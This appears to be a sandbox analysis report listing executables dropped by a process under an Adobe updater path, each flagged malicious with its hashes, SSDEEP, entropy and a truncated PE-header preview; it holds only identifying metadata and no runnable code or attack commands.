                                                                                                                                                        MD5:DB2A31CA4AE54CB21AAFF7D3698C84E7
                                                                                                                                                        SHA1:A6212608FA6EACF413BB0E84C2AC2DFDBF0EFE7B
                                                                                                                                                        SHA-256:F562D00FD94B94C1C8E3A53A221FB7ABC6F9BE409D0847F96B96491A46DD2DEE
                                                                                                                                                        SHA-512:5F325B1D6CBAC1711212F2D401B7A4669B88AAC13DD023B85F56727BC7EBE1642D416E5C6DCD873FF0895EF0EDFB8B91AAEBFD7BBC19DB6DFBE2D413E6E58FBF
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................0........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.529273880191391
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:pAmTiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Cm/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:5B00A0A0366627DB0EA8E2C0BA00D449
                                                                                                                                                        SHA1:4E46B58A157FD5E94A413AC94A5514ADE14195F9
                                                                                                                                                        SHA-256:83C0AE056E5DDB009CA2DB5D72FCB2E11066646ACF92303068C08A7D34000952
                                                                                                                                                        SHA-512:3127DAB383097B5C78F62BDC76FC7CF28A53290213B658F668370445326EFA1B9117FD27F026D14BB5A0FD051F89437841E7B4477123EF41E1A5057D6F71CF43
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................,3.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.529325464901798
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:S1S7iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:o6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:76E8FD2C94DB734118728E0A03010149
                                                                                                                                                        SHA1:F1157FE81255246BDE43DD3A459BB4663E73053D
                                                                                                                                                        SHA-256:F578BA86B2521E6C77707D1673823BDEEAB9A22F127F1F6B39576B998E2B9062
                                                                                                                                                        SHA-512:C8E6FBFDD1641A77C56547EC402C3610F541EF2E562DC7EB1A5ED438E32B41E86FEA6239260EA3DDE78155717B9CF9BD7EA06ECF443DE44D1FD57B86781FDD75
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                        Entropy (8bit):4.52938773435506
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:TU/DiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Y//TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:24A61F4F6181A1830B6BCFB27A713B51
                                                                                                                                                        SHA1:702C54ABDB59F202D4ED3C97848C3A8891620584
                                                                                                                                                        SHA-256:A94BCE67ECD0B474DBF19BD1334580781CA456ECE9530D893E9FD98A25A208C7
                                                                                                                                                        SHA-512:D80335F0F16EAAF35CEC1CC1415C5AF3073E5714F075C14FE5B84B7627CAA679C10DC04707578E811BF4DD5379D143698BAB1A116BBC6295FDB669BDD3937B39
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................8........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1358336
                                                                                                                                                        Entropy (8bit):4.612098870617364
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:CEd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CCLNiXicJFFRGNzj3
                                                                                                                                                        MD5:A6AF640B125E7FF29069B1E9ED0F9835
                                                                                                                                                        SHA1:02C9B8C165E7074CAA7131568C106F8F56F957D7
                                                                                                                                                        SHA-256:739DDE14410B1AA9F89DCACF184FD6844B62E47D71C5425922702CF3B457D70B
                                                                                                                                                        SHA-512:9DA82C15DBCE801C1750070A7B26B3243BBEDE6D4B44274A50F47DB0B46FE3FCDE3B8D4D794DCE9D0B835976C0D88C5A99D31DCC5D32E7EA5D3D4050B4FB07C3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@..................................B..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1298432
                                                                                                                                                        Entropy (8bit):4.52896184268017
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:KFQ/iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:8w/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:6ACCE3B59798A2E1C570297B4647CF66
                                                                                                                                                        SHA1:ABBF928FC8A82E59009999025069993AA11717F9
                                                                                                                                                        SHA-256:46D35B4D39C86BA59F4C508DD6B61257486E644A8B70F44466928CF95A9EAF01
                                                                                                                                                        SHA-512:CF6F1998931AE82DF3F82D631134C49CD0363A0E85A983A3F6AD80BDB1832E351C1F84B1B6C5F240B6E83FFAD6449FA82DC324AFFBF0FCD08396FFC029717B32
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...`...P.......0..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1454592
                                                                                                                                                        Entropy (8bit):4.787851748500957
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:Ci7le3roAZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:RloroAZLNiXicJFFRGNzj3
                                                                                                                                                        MD5:5BDF90D4C8D924B133E5B1575BA9D0FE
                                                                                                                                                        SHA1:F6F854ECC3EDC9532ABE8DB206BBFEC4886557DF
                                                                                                                                                        SHA-256:E3EA0C439548ABE2B37533387A72389CFB8452F30D05E19F98D5BFB0BD4864E0
                                                                                                                                                        SHA-512:7DF2D39D6DC5F3A1403ADAD3F9E442DB700720D041F212E8DF4CFF95D6CB285B63BBF1CFAEA786E81ADE40CBC018858517C72F5B4EBD2A9459B383E7772C09C2
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@!........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1424896
                                                                                                                                                        Entropy (8bit):4.811521391654936
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:kNfQNF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mGFLNiXicJFFRGNzj3
                                                                                                                                                        MD5:6083F8CB709515B65E9280A4D0FD138F
                                                                                                                                                        SHA1:7C0626E6F6583DE1D165DF0AD264CE7AD277EFCB
                                                                                                                                                        SHA-256:E470F3FCCB28979BFC4CB56180963F3BB48AA77752CBFF12734E7004B0A1659E
                                                                                                                                                        SHA-512:D19DCC30F77C6DCBD185C38FA069C1CCA84B4BDE46A0AFBFEA4C00D0200E46E0701E724FC7B7ED7D47FC8A043C6A180879965E4E9510D5C5ABCF22D4A584AB9E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................... ......I......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@......................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1443328
                                                                                                                                                        Entropy (8bit):4.832390578482101
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:aLia/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8LNiXicJFFRGNzj3
                                                                                                                                                        MD5:A3C03C3E6444BE8AD9C97A26BF924BA2
                                                                                                                                                        SHA1:D6FAAFF2E8C3F888C028769C902D3F0934A4D13E
                                                                                                                                                        SHA-256:AD18D4603C24A629E4EDB057EDF4D091906E09020AEC0DC87570636A67295F6D
                                                                                                                                                        SHA-512:8AE0970F3EDDB055194BCF15A97AA2FD94D0DFC4EFDCFD8D195ABAF7842CF054F74FED78DE7FAD858DAAF3717B788D6510B9610A3DBBAD850AB7B41C80382143
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .....O/........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1443328
                                                                                                                                                        Entropy (8bit):4.832391183481315
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:iLia/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0LNiXicJFFRGNzj3
                                                                                                                                                        MD5:0D3567F4C89B94D419020FFC848E0E82
                                                                                                                                                        SHA1:BAEBD1388A079F648A3D87A35C184E357FCDD242
                                                                                                                                                        SHA-256:C8DECD37F0EC1FD86FCF933E0FD0524A14F2E9A67045E3127F662B7C173DE6AE
                                                                                                                                                        SHA-512:803B971270D9502EAEB2D56BA59AA6C28D75B7BCABDAE0E7FE8012ABF8489F544B3D047AB0CEA65688849E6AE2B9F35FDD7D5991EB119E64498BF19D38DDFB0D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1499136
                                                                                                                                                        Entropy (8bit):4.787930512257776
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:qf+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qf+LNiXicJFFRGNzj3
                                                                                                                                                        MD5:0DFABBDE31439B30CC41E326E1D463B3
                                                                                                                                                        SHA1:D8589E3D25B8C4926D0FEFBFAEFF05C062AA5DE5
                                                                                                                                                        SHA-256:01571466E06A2BB9D97C71C6065D048E00B8F98172D29F632741C7DD76DC8B53
                                                                                                                                                        SHA-512:1D3510A24F5EE9642378638FDBDD4478EE0D160244E2003AAC37DC90B9739490179F293A94B75250CCFD0004160F227DA51AADE3C5E6A50ADAB8950B8E8E8C3F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@..............................!......(.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1651712
                                                                                                                                                        Entropy (8bit):5.153465553755081
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:IbUO42K/Ek/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:IRkLNiXicJFFRGNzj3
                                                                                                                                                        MD5:D25F8E8B9EE3F1A47612BBC3DEEFE7CB
                                                                                                                                                        SHA1:C9F51E6992927480FF8938757CFBD664983931A7
                                                                                                                                                        SHA-256:E6DA39613548B885A6B22A86BF15CBD2A53D7E30DB77FB095349B332B1340117
                                                                                                                                                        SHA-512:F1F6FA2242232A40790EDDE48CAD1882FCDC6E05B89DC7DB06E0EB6E0C2319030A3C9D4672FA8CE41B4BA1D5849DD00C17D163F5AB77AB6C15CE6BFA60893356
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................0$.....'b........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):52712960
                                                                                                                                                        Entropy (8bit):7.9617448731387315
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1572864:nKjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:QicZmsR3Lo/cnLe
                                                                                                                                                        MD5:AAA59886AC7E1192D1DD8BC62436E890
                                                                                                                                                        SHA1:F4DF228A50A6EF7DBB052377FD561C5C55A0E82A
                                                                                                                                                        SHA-256:D4A454E20062B7EEB29A7E4CEFE64D1C743E8CF332A1C2D337FC0AE74093D1DC
                                                                                                                                                        SHA-512:D4B52EE72A961A0506643211B63DB8CC6F1F94C46886414E54E71D87F0D2418C5A7E00D2F684E5110EED8F52D73E92C8F33A0F47156880549538823E9D5EC88F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4993536
                                                                                                                                                        Entropy (8bit):6.808158751166691
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:nlkkCqyDEY7+o3OBvfGVY+40yaHyS+9s/pLp7wRGpj3:lkkCqaE68eV+0yAE6LdF9
                                                                                                                                                        MD5:FA4B3365856A01D13CE97CCDFE4CF06F
                                                                                                                                                        SHA1:18B086C4C5D5C551991B2CA8431C20FD4EB03C02
                                                                                                                                                        SHA-256:EEEF45C58F0297BBA40DFAE23A02AB536A07A5FC7FADC6BD5DB0554C32722BCE
                                                                                                                                                        SHA-512:2A70BFE6EF0A2BA42681BC6AE10AB1B74CF83FA764ED6AC8ABCD1A2207C905F5DCF5A4AAF48D495A5E05EA52FD2C46A20A696157DCEE52A20F0945810E2E273D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL......*M......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1324032
                                                                                                                                                        Entropy (8bit):4.550238573205928
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:liJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34zD:p/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:1F68D2F60BBBA1993966EFAD6D2ECDB4
                                                                                                                                                        SHA1:E2C5C49BA7952FAF148F5BABEDECDF89CD483EDB
                                                                                                                                                        SHA-256:84867DD3C4447D1355D4743200DEAAE04CCA6C833929EAC785A168FF5F5AD5CC
                                                                                                                                                        SHA-512:C5F79DCB32811A7078886BF6174624C745AF07525F708B80AD5BCBCC0E5EDBFBA1BC0078AEDEC8CEAFB95704E010BA0BAD5D9159CECD4D21B05C0DFD169D0DC2
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@.......................... .......)..................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1678336
                                                                                                                                                        Entropy (8bit):4.927989586363605
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:iyAAWSS2Htn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:iIUMtnLNiXicJFFRGNzj3
                                                                                                                                                        MD5:46DD894F32F2FAF5D104A61D2C207E9D
                                                                                                                                                        SHA1:08D44449E9B05C34B2196D92EFF365B3BF82C0A2
                                                                                                                                                        SHA-256:E584AB45F95342ECA8ECC76BBC924A475D9A420DC28263DD2AE13E1245636A74
                                                                                                                                                        SHA-512:D01602F74C0BAFA8402ABB0365F1FE55685698B9B495A8B55B4BA813C5523E6EF9B08BA6FCC5BE878D91D7B9492C5A9C7794FB1F34336CE8D83A371A6D27128D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@...........................$......R..................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1449472
                                                                                                                                                        Entropy (8bit):4.753531024262293
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:xSd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:aLNiXicJFFRGNzj3
                                                                                                                                                        MD5:77170826C8B9A5FCA70DA58075AF4374
                                                                                                                                                        SHA1:D629847C498A163602F1B691550F084FCAA6E2FC
                                                                                                                                                        SHA-256:FB6194A8AD9F0C8BB6DDF9DB10BEB55B89EE9724FB579E21855E521F66204951
                                                                                                                                                        SHA-512:05EEB9A660DCAC630793EABFD092E39763467ACD55FB7DA4C9DDAC251C342B97A04996BCA31F7ECE1C61E3E3F4B9B36F26E2EF3FC86C155F28EE639F0D1026B4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@...........................!.....%w.......................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...............^..............@...........................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1303552
                                                                                                                                                        Entropy (8bit):4.5381463449265045
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:Y0PiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:v/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:E64FBF87ACE1DDC9F6CD03083B03B019
                                                                                                                                                        SHA1:9ACA062A795072E57251FBB91E292761BE324C8F
                                                                                                                                                        SHA-256:CA7A2352EA5450AD07ED6999E4C01E1368DBDB0C22F2255E70BD8E526E5BEB04
                                                                                                                                                        SHA-512:812EC727DEBBD9A639202320F35F313762CEDAE03137F3061152CABADFB0042EE61BE354D9EB68174CE22B49886CCF03378FAE6E6F3CE1AEB0D7EB32AEC2BF96
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@..................................J.......................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...`...........D..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1574400
                                                                                                                                                        Entropy (8bit):4.962250120495831
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:VAZHHrUZF/B/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Ve4ZFBLNiXicJFFRGNzj3
                                                                                                                                                        MD5:EA15762D32347382407E68D843BCD1C0
                                                                                                                                                        SHA1:4EB2C10367FA211EF3F7A656DF7E0A3ACA892AE1
                                                                                                                                                        SHA-256:74A81A6D99E2F03A41C548F8524400B52383CA594CD33EAE8FB1B1FE4BD51952
                                                                                                                                                        SHA-512:834172703A021A60AB3F856B3F5342712F3CC597FC6C9A562AE38B4F516A4DAD70FD223098CA494FFDB48E05ACFCA9E2C7CB6F444D39BA1A7520A4804BE95B3E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@...........................#......P..........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...............F..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):53721600
